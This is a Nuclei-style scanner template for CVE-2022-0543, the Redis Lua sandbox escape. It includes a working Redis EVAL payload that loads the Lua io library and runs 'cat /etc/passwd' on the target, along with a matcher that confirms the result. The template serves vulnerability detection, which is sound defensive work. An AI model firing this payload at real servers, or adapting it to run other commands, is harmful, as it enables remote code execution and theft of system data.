id: CVE-2022-0543

info:
  name: Redis Sandbox Escape - Remote Code Execution
  author: dwisiswant0
  severity: critical
  description: |
    This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The
    vulnerability was introduced by Debian and Ubuntu Redis packages that
    insufficiently sanitized the Lua environment. The maintainers failed to
    disable the package interface, allowing attackers to load arbitrary libraries.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and compromise of the affected system.
  remediation: Update to the most recent versions currently available.
  reference:
    - https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce
    - https://attackerkb.com/topics/wyA1c1HIC8/cve-2022-0543/rapid7-analysis#rapid7-analysis
    - https://bugs.debian.org/1005787
    - https://www.debian.org/security/2022/dsa-5081
    - https://lists.debian.org/debian-security-announce/2022/msg00048.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2022-0543
    epss-score: 0.97184
    cpe: cpe:2.3:a:redis:redis:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: redis
    product: redis
    shodan-query:
      - redis_version
      - redis
  tags: cve,cve2022,network,redis,unauth,rce,kev,tcp
tcp:
  - host:
      - "{{Hostname}}"
      - "tls://{{Hostname}}"
    port: 6380

    inputs:
      - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n"
    read-size: 64

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 490a00463044022011a0e63ea5c6cc1be0d103b340fb94da0f291e22de5c2e639a40077750563ce902203e29f7cc62b489efc3598fec2d549b58bfd9bff17388c81b09e2637125c3deff:922c64590222798bb761d5b6d8e72950